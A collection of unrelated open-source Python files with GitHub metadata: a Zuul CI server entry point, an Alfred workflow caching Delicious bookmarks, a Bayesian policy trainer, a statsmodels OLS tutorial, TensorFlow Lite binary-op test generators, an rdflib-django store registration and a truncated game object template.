        """Return a human-readable zuul version string."""
        # Imported lazily; see comment at top of file about zuul imports.
        from zuul.version import version_info as zuul_version_info
        return "Zuul version: %s" % zuul_version_info.version_string()

    def read_config(self):
        """Load zuul.conf from -c or the default locations into self.config.

        Raises:
            Exception: If no config file exists at any known location.
        """
        self.config = ConfigParser.ConfigParser()
        if self.args.config:
            locations = [self.args.config]
        else:
            locations = ['/etc/zuul/zuul.conf',
                         '~/zuul.conf']
        for fp in locations:
            if os.path.exists(os.path.expanduser(fp)):
                # First existing file wins.
                self.config.read(os.path.expanduser(fp))
                return
        raise Exception("Unable to locate config file in %s" % locations)

    def setup_logging(self, section, parameter):
        """Configure logging from the config file, or fall back to DEBUG.

        Args:
            section: Config section to look in (e.g. 'zuul').
            parameter: Option naming a fileConfig-style logging config path.

        Raises:
            Exception: If the configured logging config file does not exist.
        """
        if self.config.has_option(section, parameter):
            fp = os.path.expanduser(self.config.get(section, parameter))
            if not os.path.exists(fp):
                raise Exception("Unable to read logging config file at %s" %
                                fp)
            logging.config.fileConfig(fp)
        else:
            logging.basicConfig(level=logging.DEBUG)

    def reconfigure_handler(self, signum, frame):
        """SIGHUP handler: re-read config and reconfigure the scheduler."""
        # Ignore further SIGHUPs while reconfiguring; re-armed below.
        signal.signal(signal.SIGHUP, signal.SIG_IGN)
        self.read_config()
        self.setup_logging('zuul', 'log_config')
        self.sched.reconfigure(self.config)
        signal.signal(signal.SIGHUP, self.reconfigure_handler)

    def exit_handler(self, signum, frame):
        """SIGUSR1 handler: drain the scheduler and shut down cleanly."""
        signal.signal(signal.SIGUSR1, signal.SIG_IGN)
        self.sched.exit()
        self.sched.join()
        self.stop_gear_server()

    def term_handler(self, signum, frame):
        """SIGTERM handler: kill the gear server child and exit immediately."""
        self.stop_gear_server()
        # os._exit skips cleanup handlers; appropriate inside a signal handler.
        os._exit(0)

    def test_config(self, job_list_path):
        """Validate layout syntax, optionally checking jobs against a list.

        Args:
            job_list_path: Optional path to a file with one available job
                name per line.

        Returns:
            True if a validation failure was found, False otherwise.
        """
        # See comment at top of file about zuul imports
        import zuul.scheduler
        import zuul.launcher.gearman
        import zuul.trigger.gerrit
        import zuul.trigger.messaging
        logging.basicConfig(level=logging.DEBUG)
        self.sched = zuul.scheduler.Scheduler()
        # Register by name with None instances; presumably only the names
        # are needed for layout validation -- confirm against testConfig.
        self.sched.registerReporter(None, 'gerrit')
        self.sched.registerReporter(None, 'smtp')
        self.sched.registerTrigger(None, 'gerrit')
        self.sched.registerTrigger(None, 'timer')
        self.sched.registerTrigger(None, 'messaging')
        layout = self.sched.testConfig(self.config.get('zuul',
                                                       'layout_config'))
        if not job_list_path:
            return False

        failure = False
        path = os.path.expanduser(job_list_path)
        if not os.path.exists(path):
            raise Exception("Unable to find job list: %s" % path)
        jobs = set()
        for line in open(path):
            v = line.strip()
            if v:
                jobs.add(v)
        for job in sorted(layout.jobs):
            if job not in jobs:
                print "Job %s not defined" % job
                failure = True
        return failure

    def start_gear_server(self):
        """Fork a child process running a gear server on port 4730."""
        pipe_read, pipe_write = os.pipe()
        child_pid = os.fork()
        if child_pid == 0:
            # Child: serve gearman until the parent's pipe end closes.
            os.close(pipe_write)
            self.setup_logging('gearman_server', 'log_config')
            import gear
            gear.Server(4730)
            # Keep running until the parent dies:
            pipe_read = os.fdopen(pipe_read)
            pipe_read.read()
            os._exit(0)
        else:
            # Parent: remember the child and hold the write end open so the
            # child's blocking read above only returns when we exit.
            os.close(pipe_read)
            self.gear_server_pid = child_pid
            self.gear_pipe_write = pipe_write

    def stop_gear_server(self):
        """Kill the forked gear server child, if one was started."""
        if self.gear_server_pid:
            os.kill(self.gear_server_pid, signal.SIGKILL)

    def main(self):
        """Wire up scheduler, triggers and reporters, then block on signals."""
        # See comment at top of file about zuul imports
        import zuul.scheduler
        import zuul.launcher.gearman
        import zuul.reporter.gerrit
        import zuul.reporter.smtp
        import zuul.trigger.gerrit
        import zuul.trigger.messaging
        import zuul.trigger.timer
        import zuul.webapp
        import zuul.rpclistener

        # Optionally run an embedded gear server in a forked child.
        if (self.config.has_option('gearman_server', 'start') and
            self.config.getboolean('gearman_server', 'start')):
            self.start_gear_server()

        self.setup_logging('zuul', 'log_config')
        self.sched = zuul.scheduler.Scheduler()

        gearman = zuul.launcher.gearman.Gearman(self.config, self.sched)
        gerrit = zuul.trigger.gerrit.Gerrit(self.config, self.sched)
        timer = zuul.trigger.timer.Timer(self.config, self.sched)
        messaging = zuul.trigger.messaging.Messaging(self.config, self.sched)
        webapp = zuul.webapp.WebApp(self.sched)
        rpc = zuul.rpclistener.RPCListener(self.config, self.sched)
        gerrit_reporter = zuul.reporter.gerrit.Reporter(gerrit)
        # Each smtp setting falls back to a default when unset in the config.
        smtp_reporter = zuul.reporter.smtp.Reporter(
            self.config.get('smtp', 'default_from')
            if self.config.has_option('smtp', 'default_from') else 'zuul',
            self.config.get('smtp', 'default_to')
            if self.config.has_option('smtp', 'default_to') else 'zuul',
            self.config.get('smtp', 'server')
            if self.config.has_option('smtp', 'server') else 'localhost',
            self.config.get('smtp', 'port')
            if self.config.has_option('smtp', 'port') else 25
        )

        self.sched.setLauncher(gearman)
        self.sched.registerTrigger(gerrit)
        self.sched.registerTrigger(timer)
        self.sched.registerTrigger(messaging)
        self.sched.registerReporter(gerrit_reporter)
        self.sched.registerReporter(smtp_reporter)

        self.sched.start()
        self.sched.reconfigure(self.config)
        self.sched.resume()
        webapp.start()
        rpc.start()

        signal.signal(signal.SIGHUP, self.reconfigure_handler)
        signal.signal(signal.SIGUSR1, self.exit_handler)
        signal.signal(signal.SIGUSR2, stack_dump_handler)
        signal.signal(signal.SIGTERM, self.term_handler)
        # Block forever, dispatching the signal handlers installed above.
        while True:
            try:
                signal.pause()
            except KeyboardInterrupt:
                print "Ctrl + C: asking scheduler to exit nicely...\n"
                self.exit_handler(signal.SIGINT, None)
def main():
    """Command-line entry point: parse args, validate, daemonize, run."""
    server = Server()
    server.parse_arguments()
    server.read_config()

    if server.args.layout:
        server.config.set('zuul', 'layout_config', server.args.layout)

    if server.args.validate:
        # --validate may carry an optional job-list path; a bare flag
        # parses as True, which test_config treats as "no list".
        path = server.args.validate
        if path is True:
            path = None
        sys.exit(server.test_config(path))

    if server.config.has_option('zuul', 'state_dir'):
        state_dir = os.path.expanduser(server.config.get('zuul', 'state_dir'))
    else:
        state_dir = '/var/lib/zuul'

    # Fail fast -- before daemonizing -- if the state dir is unwritable.
    test_fn = os.path.join(state_dir, 'test')
    try:
        f = open(test_fn, 'w')
        f.close()
        os.unlink(test_fn)
    except:
        print
        print "Unable to write to state directory: %s" % state_dir
        print
        raise

    if server.config.has_option('zuul', 'pidfile'):
        pid_fn = os.path.expanduser(server.config.get('zuul', 'pidfile'))
    else:
        pid_fn = '/var/run/zuul/zuul.pid'
    # 10-second timeout acquiring the pid lock file.
    pid = pid_file_module.TimeoutPIDLockFile(pid_fn, 10)

    if server.args.nodaemon:
        server.main()
    else:
        with daemon.DaemonContext(pidfile=pid):
            server.main()
if __name__ == "__main__":
    # Allow running directly from a source checkout without installing.
    sys.path.insert(0, '.')
    main()
| {
"content_hash": "f4743bd541a7f41995c143e4127353c0",
"timestamp": "",
"source": "github",
"line_count": 265,
"max_line_length": 78,
"avg_line_length": 35.82641509433962,
"alnum_prop": 0.5931114388034548,
"repo_name": "devdattakulkarni/zuul_messaging",
"id": "7b45b9b104637cf804d90cec0f67b6dde138e5a2",
"size": "10161",
"binary": false,
"copies": "1",
"ref": "refs/heads/solum_messaging_trigger",
"path": "zuul/cmd/server.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "9486"
},
{
"name": "Python",
"bytes": "352158"
},
{
"name": "Shell",
"bytes": "594"
}
],
"symlink_target": ""
} |
import api
import workflow
def get_posts(access_token):
    """Return all Delicious bookmarks for the authenticated user."""
    payload = api.Delicious(access_token).posts.all()
    return payload['posts']['post']
def main(wf):
    """Workflow entry point: refresh the cached Delicious posts."""
    try:
        # The token is stored in the system Keychain.
        token = wf.get_password('delicious_access_token')
    except workflow.PasswordNotFound:
        # Nothing to fetch without a token; just record the problem.
        wf.logger.error('No API key saved')
        return 0
    wf.cached_data('delicious_posts',
                   lambda: get_posts(token),
                   max_age=600)
if __name__ == '__main__':
    # Alfred-Workflow's runner wraps main() with logging/error handling.
    workflow.Workflow().run(main)
| {
"content_hash": "87806649cd653d9d185504183a78d554",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 83,
"avg_line_length": 27.26086956521739,
"alnum_prop": 0.6475279106858054,
"repo_name": "scraplesh/delicious-alfredworkflow",
"id": "2bd1d977a5ea6cfbcb6af78f493d9f085111aaf4",
"size": "627",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "update.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "900967"
},
{
"name": "XML",
"bytes": "5951"
}
],
"symlink_target": ""
} |
import torch as t
from torch.autograd import Variable as V
from torch import FloatTensor as FT
import numpy as np
from bayestorch.hmc import HMCSampler
class SimpleTrainer:
    """Alternates policy evaluation, Bayesian critic sampling, and policy
    optimization.

    The critic and hallucinator are sampled jointly with HMC against the
    (policy, reward) pairs stored in the policy buffer; the policy is then
    optimized against the critic's reward prediction on hallucinated
    states.  The critic is assumed to return (mean, log-std-dev) of the
    predicted reward -- TODO confirm against the critic implementation.
    """

    def __init__(self, env, critic, hallucinator, policy_buffer, policy_c,
                 noise_dim):
        """Store collaborators.

        Args:
            env: environment exposing obs_size, action_size, new_episode()
                and next_obs().
            critic: model mapping (states, actions) to a reward estimate.
            hallucinator: generates batches of states from a noise vector.
            policy_buffer: buffer of (state_dict, reward) pairs.
            policy_c: policy constructor, called as
                policy_c(obs_size, action_size).
            noise_dim: dimensionality of the hallucinator's noise input.
        """
        self.env = env
        self.hallucinator = hallucinator
        self.critic = critic
        self.policy_buffer = policy_buffer
        self.policy_c = policy_c
        self.noise_dim = noise_dim

    def train(self, train_steps, sample_steps, opt_steps):
        """Run the full evaluate / sample / optimize loop train_steps times."""
        in_dim = self.env.obs_size
        out_dim = self.env.action_size
        cur_policy = self.policy_c(in_dim, out_dim)
        for i in range(train_steps):
            reward = self.sample_episode(cur_policy)
            self.policy_buffer.put(cur_policy.state_dict(), reward)
            self.train_critic_hallucinator(sample_steps)
            self.train_policy(opt_steps)

    def sample_episode(self, policy, n=1, skip=3):
        """Run n episodes with `policy`; return the average total reward."""
        total_reward = 0
        for i in range(n):
            # BUG FIX: `done` must be reset per episode.  It was previously
            # initialized once before the loop, so every episode after the
            # first skipped its while-loop entirely when n > 1.
            done = False
            cur_obs = self.env.new_episode()
            # Renamed from `t` to avoid shadowing the module's torch alias.
            step = 0
            while not done:
                cur_obs = V(FT(cur_obs)).unsqueeze(0)
                # Render only every `skip`-th frame.
                display = (step % skip == 0)
                cur_action = policy.forward(cur_obs).data.cpu().numpy()
                cur_obs, cur_reward, done = self.env.next_obs(
                    cur_action.squeeze(0), render=display)
                total_reward += cur_reward
                step += 1
        avg_episode_reward = total_reward / n
        return avg_episode_reward

    def train_critic_hallucinator(self, sample_steps):
        """HMC-sample critic/hallucinator parameters given the buffer."""
        def closure_gen():
            # Prior term first, then one likelihood closure per stored
            # policy; the sampler consumes the generator each step.
            yield (lambda: self.critic.get_prior_llh())
            for state_dict, reward in self.policy_buffer:
                policy = self.policy_c(self.env.obs_size,
                                       self.env.action_size)
                policy.load_state_dict(state_dict)

                def closure():
                    noise = V(FT(np.random.randn(self.noise_dim)))
                    states = self.hallucinator.forward(noise.unsqueeze(0))
                    # Merge the batch dim (currently 1) with the
                    # hallucinated-state dim.
                    states = states.view(
                        states.size(0) * self.hallucinator.n, -1)
                    actions = policy.forward(states)
                    actions = actions.view(1, -1)
                    states = states.view(1, -1)
                    # BUG FIX: call the critic once and read mean/log-std
                    # from separate outputs (both previously read index 0),
                    # and return the log-likelihood -- previously the
                    # constant `reward` was returned, so the HMC target
                    # never depended on the model parameters.
                    out = self.critic(states, actions)
                    mean, lsd = out[0], out[1]
                    llh = gaussian_llh(mean, lsd, reward)
                    return llh
                yield closure

        params = self.critic.parameter_list() \
            + self.hallucinator.parameter_list()
        sampler = HMCSampler(params)
        for i in range(sample_steps):
            sampler.step(closure_gen)

    def train_policy(self, opt_steps):
        """Optimize the most recent buffered policy against the critic.

        Returns the optimized policy's state_dict.
        """
        state_dict, _ = self.policy_buffer.peek()
        policy = self.policy_c(self.env.obs_size, self.env.action_size)
        policy.load_state_dict(state_dict)
        opt = t.optim.SGD(policy.parameters(), lr=0.001)

        # TODO: this duplicates the hallucination code above; share a helper.
        def closure():
            noise = V(FT(np.random.randn(self.noise_dim)))
            states = self.hallucinator.forward(noise.unsqueeze(0))
            # Merge the batch dim (currently 1) with the hallucinated-state
            # dim.
            states = states.view(states.size(0) * self.hallucinator.n, -1)
            actions = policy.forward(states)
            actions = actions.view(1, -1)
            states = states.view(1, -1)
            reward = self.critic(states, actions)[0]
            # BUG FIX: SGD minimizes, and step(closure) does not compute
            # gradients by itself -- the closure previously never called
            # backward(), so every step was a no-op.  Minimize the negated
            # predicted reward instead.
            loss = -reward.mean()
            loss.backward()
            return loss

        for i in range(opt_steps):
            opt.zero_grad()
            opt.step(closure)
        return policy.state_dict()
def gaussian_llh(mean, log_std_dev, reward):
    """Gaussian-style log-likelihood surrogate of `reward` under
    (mean, log_std_dev).

    NOTE(review): simplified form -- the squared error is not scaled by
    exp(-2 * log_std_dev) as a normalized Gaussian llh would be;
    presumably intentional, worth confirming.
    """
    squared_error = (mean - reward) ** 2
    return -squared_error - 2 * log_std_dev
| {
"content_hash": "0c78b6a761b9626b72903fff9a0d8123",
"timestamp": "",
"source": "github",
"line_count": 107,
"max_line_length": 100,
"avg_line_length": 36.06542056074766,
"alnum_prop": 0.5750194350868101,
"repo_name": "fizz-ml/policybandit",
"id": "b88696a3e87855e5a9061958b5aecb47382f1178",
"size": "3859",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "trainer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19257"
}
],
"symlink_target": ""
} |
# Worked OLS examples (converted notebook): basic estimation, nonlinear-
# in-x models, dummy variables, F tests, and multicollinearity diagnostics.
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import statsmodels.api as sm

# Fixed seed so the generated "artificial data" is reproducible.
np.random.seed(9876789)

# ## OLS estimation
#
# Artificial data:
nsample = 100
x = np.linspace(0, 10, 100)
X = np.column_stack((x, x**2))
# beta = (intercept, slope on x, slope on x^2) -- intercept column is
# prepended by add_constant below.
beta = np.array([1, 0.1, 10])
e = np.random.normal(size=nsample)

# Our model needs an intercept so we add a column of 1s:
X = sm.add_constant(X)
y = np.dot(X, beta) + e

# Fit and summary:
model = sm.OLS(y, X)
results = model.fit()
print(results.summary())

# Quantities of interest can be extracted directly from the fitted model.
# Type ``dir(results)`` for a full list. Here are some examples:
print("Parameters: ", results.params)
print("R2: ", results.rsquared)

# ## OLS non-linear curve but linear in parameters
#
# We simulate artificial data with a non-linear relationship between x and
# y:
nsample = 50
sig = 0.5
x = np.linspace(0, 20, nsample)
X = np.column_stack((x, np.sin(x), (x - 5)**2, np.ones(nsample)))
beta = [0.5, 0.5, -0.02, 5.0]
y_true = np.dot(X, beta)
y = y_true + sig * np.random.normal(size=nsample)

# Fit and summary:
res = sm.OLS(y, X).fit()
print(res.summary())

# Extract other quantities of interest:
print("Parameters: ", res.params)
print("Standard errors: ", res.bse)
print("Predicted values: ", res.predict())

# Draw a plot to compare the true relationship to OLS predictions.
# Confidence intervals around the predictions are built using the
# ``wls_prediction_std`` command.
pred_ols = res.get_prediction()
iv_l = pred_ols.summary_frame()["obs_ci_lower"]
iv_u = pred_ols.summary_frame()["obs_ci_upper"]

fig, ax = plt.subplots(figsize=(8, 6))
ax.plot(x, y, "o", label="data")
ax.plot(x, y_true, "b-", label="True")
ax.plot(x, res.fittedvalues, "r--.", label="OLS")
ax.plot(x, iv_u, "r--")
ax.plot(x, iv_l, "r--")
ax.legend(loc="best")

# ## OLS with dummy variables
#
# We generate some artificial data. There are 3 groups which will be
# modelled using dummy variables. Group 0 is the omitted/benchmark category.
nsample = 50
groups = np.zeros(nsample, int)
groups[20:40] = 1
groups[40:] = 2
# dummy = (groups[:,None] == np.unique(groups)).astype(float)
dummy = pd.get_dummies(groups).values
x = np.linspace(0, 20, nsample)
# drop reference category
X = np.column_stack((x, dummy[:, 1:]))
X = sm.add_constant(X, prepend=False)

beta = [1.0, 3, -3, 10]
y_true = np.dot(X, beta)
e = np.random.normal(size=nsample)
y = y_true + e

# Inspect the data:
print(X[:5, :])
print(y[:5])
print(groups)
print(dummy[:5, :])

# Fit and summary:
res2 = sm.OLS(y, X).fit()
print(res2.summary())

# Draw a plot to compare the true relationship to OLS predictions:
pred_ols2 = res2.get_prediction()
iv_l = pred_ols2.summary_frame()["obs_ci_lower"]
iv_u = pred_ols2.summary_frame()["obs_ci_upper"]

fig, ax = plt.subplots(figsize=(8, 6))
ax.plot(x, y, "o", label="Data")
ax.plot(x, y_true, "b-", label="True")
ax.plot(x, res2.fittedvalues, "r--.", label="Predicted")
ax.plot(x, iv_u, "r--")
ax.plot(x, iv_l, "r--")
legend = ax.legend(loc="best")

# ## Joint hypothesis test
#
# ### F test
#
# We want to test the hypothesis that both coefficients on the dummy
# variables are equal to zero, that is, $R \times \beta = 0$. An F test
# leads us to strongly reject the null hypothesis of identical constant in
# the 3 groups:
R = [[0, 1, 0, 0], [0, 0, 1, 0]]
print(np.array(R))
print(res2.f_test(R))

# You can also use formula-like syntax to test hypotheses
print(res2.f_test("x2 = x3 = 0"))

# ### Small group effects
#
# If we generate artificial data with smaller group effects, the T test
# can no longer reject the Null hypothesis:
beta = [1.0, 0.3, -0.0, 10]
y_true = np.dot(X, beta)
y = y_true + np.random.normal(size=nsample)

res3 = sm.OLS(y, X).fit()
print(res3.f_test(R))
print(res3.f_test("x2 = x3 = 0"))

# ### Multicollinearity
#
# The Longley dataset is well known to have high multicollinearity. That
# is, the exogenous predictors are highly correlated. This is problematic
# because it can affect the stability of our coefficient estimates as we
# make minor changes to model specification.
from statsmodels.datasets.longley import load_pandas

y = load_pandas().endog
X = load_pandas().exog
X = sm.add_constant(X)

# Fit and summary:
ols_model = sm.OLS(y, X)
ols_results = ols_model.fit()
print(ols_results.summary())

# #### Condition number
#
# One way to assess multicollinearity is to compute the condition number.
# Values over 20 are worrisome (see Greene 4.9). The first step is to
# normalize the independent variables to have unit length:
norm_x = X.values
for i, name in enumerate(X):
    if name == "const":
        # Leave the intercept column un-normalized.
        continue
    norm_x[:, i] = X[name] / np.linalg.norm(X[name])
norm_xtx = np.dot(norm_x.T, norm_x)

# Then, we take the square root of the ratio of the biggest to the
# smallest eigen values.
eigs = np.linalg.eigvals(norm_xtx)
condition_number = np.sqrt(eigs.max() / eigs.min())
print(condition_number)

# #### Dropping an observation
#
# Greene also points out that dropping a single observation can have a
# dramatic effect on the coefficient estimates:
ols_results2 = sm.OLS(y.iloc[:14], X.iloc[:14]).fit()
print("Percentage change %4.2f%%\n" * 7 % tuple([
    i for i in (ols_results2.params - ols_results.params) /
    ols_results.params * 100
]))

# We can also look at formal statistics for this such as the DFBETAS -- a
# standardized measure of how much each coefficient changes when that
# observation is left out.
infl = ols_results.get_influence()

# In general we may consider DBETAS in absolute value greater than
# $2/\sqrt{N}$ to be influential observations
# (bare expression below is a notebook artifact: it displays the cutoff
# 2/sqrt(N) interactively but has no effect when run as a script).
2.0 / len(X)**0.5
print(infl.summary_frame().filter(regex="dfb"))
| {
"content_hash": "48f5dfe03a8ecc052b21f9422ce6cce7",
"timestamp": "",
"source": "github",
"line_count": 219,
"max_line_length": 76,
"avg_line_length": 25.91324200913242,
"alnum_prop": 0.6845814977973568,
"repo_name": "josef-pkt/statsmodels",
"id": "1b1a76ebcf442c1196e66deafc844a31c245b634",
"size": "5894",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "examples/python/ols.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "AGS Script",
"bytes": "457842"
},
{
"name": "Assembly",
"bytes": "10035"
},
{
"name": "Batchfile",
"bytes": "625"
},
{
"name": "C",
"bytes": "381"
},
{
"name": "Cython",
"bytes": "225838"
},
{
"name": "Fortran",
"bytes": "16671"
},
{
"name": "HTML",
"bytes": "148470"
},
{
"name": "MATLAB",
"bytes": "100525"
},
{
"name": "Python",
"bytes": "14428857"
},
{
"name": "R",
"bytes": "106569"
},
{
"name": "Shell",
"bytes": "25322"
},
{
"name": "Stata",
"bytes": "50129"
}
],
"symlink_target": ""
} |
"""Test configs for binary_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.lite.testing.zip_test_utils import create_tensor_data
from tensorflow.lite.testing.zip_test_utils import make_zip_of_tests
from tensorflow.lite.testing.zip_test_utils import register_make_test_function
def make_binary_op_tests(options,
                         binary_operator,
                         allow_fully_quantize=False,
                         expected_tf_failures=0):
  """Make a set of tests to do binary ops with and without broadcast.

  Args:
    options: zip-test options forwarded to make_zip_of_tests.
    binary_operator: callable taking two tensors and returning one.
    allow_fully_quantize: if True, keep the fully_quantize=True parameter
      combinations (their inputs are then drawn from [-1, 1]); otherwise
      those combinations are filtered out below.
    expected_tf_failures: number of parameter combinations expected to
      fail on the TensorFlow side.
  """
  test_parameters = [
      # Avoid creating all combinations to keep the test size small.
      {
          "dtype": [tf.float32, tf.int32],
          "input_shape_1": [[1, 3, 4, 3]],
          "input_shape_2": [[1, 3, 4, 3]],
          "activation": [True],
          "fully_quantize": [False],
      },
      {
          "dtype": [tf.float32],
          "input_shape_1": [[5]],
          "input_shape_2": [[5]],
          "activation": [False, True],
          "fully_quantize": [False],
      },
      # Broadcast: full shape op vector (and vice versa below).
      {
          "dtype": [tf.float32, tf.int32, tf.int64],
          "input_shape_1": [[1, 3, 4, 3]],
          "input_shape_2": [[3]],
          "activation": [True, False],
          "fully_quantize": [False],
      },
      {
          "dtype": [tf.float32, tf.int32],
          "input_shape_1": [[3]],
          "input_shape_2": [[1, 3, 4, 3]],
          "activation": [True, False],
          "fully_quantize": [False],
      },
      # Scalar inputs (rank 0).
      {
          "dtype": [tf.float32],
          "input_shape_1": [[]],
          "input_shape_2": [[]],
          "activation": [False],
          "fully_quantize": [False],
      },
      # Zero-size input broadcast against a one-element input.
      {
          "dtype": [tf.float32],
          "input_shape_1": [[0]],
          "input_shape_2": [[1]],
          "activation": [False],
          "fully_quantize": [False],
      },
      # Fully-quantized variants of the shapes above (float32 only,
      # no activation); kept only when allow_fully_quantize is True.
      {
          "dtype": [tf.float32],
          "input_shape_1": [[1, 3, 4, 3]],
          "input_shape_2": [[1, 3, 4, 3]],
          "activation": [False],
          "fully_quantize": [True],
      },
      {
          "dtype": [tf.float32],
          "input_shape_1": [[5]],
          "input_shape_2": [[5]],
          "activation": [False],
          "fully_quantize": [True],
      },
      {
          "dtype": [tf.float32],
          "input_shape_1": [[1, 3, 4, 3]],
          "input_shape_2": [[3]],
          "activation": [False],
          "fully_quantize": [True],
      },
      {
          "dtype": [tf.float32],
          "input_shape_1": [[3]],
          "input_shape_2": [[1, 3, 4, 3]],
          "activation": [False],
          "fully_quantize": [True],
      },
      {
          "dtype": [tf.float32],
          "input_shape_1": [[]],
          "input_shape_2": [[]],
          "activation": [False],
          "fully_quantize": [True],
      },
  ]

  # test_parameters include fully_quantize option only when
  # allow_fully_quantize is True.
  if not allow_fully_quantize:
    test_parameters = [
        test_parameter for test_parameter in test_parameters
        if True not in test_parameter["fully_quantize"]
    ]

  def build_graph(parameters):
    """Builds the graph given the current parameters."""
    input1 = tf.compat.v1.placeholder(
        dtype=parameters["dtype"],
        name="input1",
        shape=parameters["input_shape_1"])
    input2 = tf.compat.v1.placeholder(
        dtype=parameters["dtype"],
        name="input2",
        shape=parameters["input_shape_2"])
    out = binary_operator(input1, input2)
    # TODO(karimnosseir): Update condition after moving to new converter.
    if parameters["activation"] and (not options.use_experimental_converter or
                                     (parameters["dtype"] != tf.int32 and
                                      parameters["dtype"] != tf.int64)):
      out = tf.nn.relu(out)
    return [input1, input2], [out]

  def build_inputs(parameters, sess, inputs, outputs):
    """Builds operand inputs for op."""
    if allow_fully_quantize:
      # Constrain inputs to [-1, 1] so quantization ranges are stable.
      input1 = create_tensor_data(
          parameters["dtype"],
          parameters["input_shape_1"],
          min_value=-1,
          max_value=1)
      input2 = create_tensor_data(
          parameters["dtype"],
          parameters["input_shape_2"],
          min_value=-1,
          max_value=1)
    else:
      input1 = create_tensor_data(parameters["dtype"],
                                  parameters["input_shape_1"])
      input2 = create_tensor_data(parameters["dtype"],
                                  parameters["input_shape_2"])
    return [input1, input2], sess.run(
        outputs, feed_dict={
            inputs[0]: input1,
            inputs[1]: input2
        })

  make_zip_of_tests(
      options,
      test_parameters,
      build_graph,
      build_inputs,
      expected_tf_failures=expected_tf_failures)
def make_binary_op_tests_func(binary_operator):
  """Bind `binary_operator` into a test generator taking only options."""
  def run_tests(options):
    make_binary_op_tests(options, binary_operator)
  return run_tests
@register_make_test_function()
def make_add_tests(options):
  """Generates tf.add tests, including fully-quantized variants."""
  make_binary_op_tests(options, tf.add, allow_fully_quantize=True)


@register_make_test_function()
def make_div_tests(options):
  """Generates tf.div tests (no quantized variants)."""
  make_binary_op_tests(options, tf.compat.v1.div)


@register_make_test_function()
def make_sub_tests(options):
  """Generates tf.subtract tests, including fully-quantized variants."""
  make_binary_op_tests(options, tf.subtract, allow_fully_quantize=True)


@register_make_test_function()
def make_mul_tests(options):
  """Generates tf.multiply tests, including fully-quantized variants."""
  make_binary_op_tests(options, tf.multiply, allow_fully_quantize=True)


@register_make_test_function()
def make_pow_tests(options):
  """Generates tf.pow tests; 7 combinations are known to fail in TF."""
  make_binary_op_tests(options, tf.pow, expected_tf_failures=7)


@register_make_test_function()
def make_floor_div_tests(options):
  """Generates tf.math.floordiv tests."""
  make_binary_op_tests(options, tf.math.floordiv)


@register_make_test_function()
def make_floor_mod_tests(options):
  """Generates tf.math.floormod tests."""
  make_binary_op_tests(options, tf.math.floormod)


@register_make_test_function()
def make_squared_difference_tests(options):
  """Generates tf.math.squared_difference tests."""
  make_binary_op_tests(options, tf.math.squared_difference)
| {
"content_hash": "f124f361db123d95774a363b77f6ee62",
"timestamp": "",
"source": "github",
"line_count": 199,
"max_line_length": 78,
"avg_line_length": 30.798994974874372,
"alnum_prop": 0.5557187143090226,
"repo_name": "arborh/tensorflow",
"id": "88702b0542fa3b6203ffc5ccf2dbfc6979eb07d7",
"size": "6818",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tensorflow/lite/testing/op_tests/binary_op.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "5003"
},
{
"name": "Batchfile",
"bytes": "45988"
},
{
"name": "C",
"bytes": "773694"
},
{
"name": "C#",
"bytes": "8562"
},
{
"name": "C++",
"bytes": "76730781"
},
{
"name": "CMake",
"bytes": "6545"
},
{
"name": "Dockerfile",
"bytes": "81136"
},
{
"name": "Go",
"bytes": "1679107"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "952944"
},
{
"name": "Jupyter Notebook",
"bytes": "567243"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "1299305"
},
{
"name": "Makefile",
"bytes": "61397"
},
{
"name": "Objective-C",
"bytes": "104706"
},
{
"name": "Objective-C++",
"bytes": "297753"
},
{
"name": "PHP",
"bytes": "24055"
},
{
"name": "Pascal",
"bytes": "3752"
},
{
"name": "Pawn",
"bytes": "17546"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "38757009"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "7459"
},
{
"name": "Shell",
"bytes": "643787"
},
{
"name": "Smarty",
"bytes": "34727"
},
{
"name": "Swift",
"bytes": "62814"
}
],
"symlink_target": ""
} |
"""
RDFlib Store implementation for Django, providing lots of extra goodies.
Use this application by just including it in your INSTALLED_APPS. After this,
you can create a new Graph using:
>>> import rdflib
>>> g = rdflib.Graph('Django')
"""
from rdflib.plugin import register
from rdflib.store import Store
register('Django', Store, 'rdflib_django.store', 'DjangoStore')
| {
"content_hash": "e5d8ff137451e5a0ed81eee6c29f097b",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 77,
"avg_line_length": 25.133333333333333,
"alnum_prop": 0.7506631299734748,
"repo_name": "publysher/rdflib-django",
"id": "0dab3f69aac8a574be5a3ff15ce8f028ab51ff2c",
"size": "377",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/rdflib_django/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "63553"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
    """Build the ITH mercenary bandolier tangible template."""
    obj = Tangible()
    obj.template = "object/tangible/wearables/bandolier/shared_ith_mercenary_bandolier.iff"
    obj.attribute_template_id = 11
    obj.stfName("item_n","ith_mercenary_bandolier")

    #### BEGIN MODIFICATIONS ####
    #### END MODIFICATIONS ####

    return obj
"content_hash": "2c7a486016af13c3ff42a96f268af91a",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 91,
"avg_line_length": 25.53846153846154,
"alnum_prop": 0.7168674698795181,
"repo_name": "obi-two/Rebelion",
"id": "b78eb5e2f6af9261200e26b4d66c8c02eb752a16",
"size": "477",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
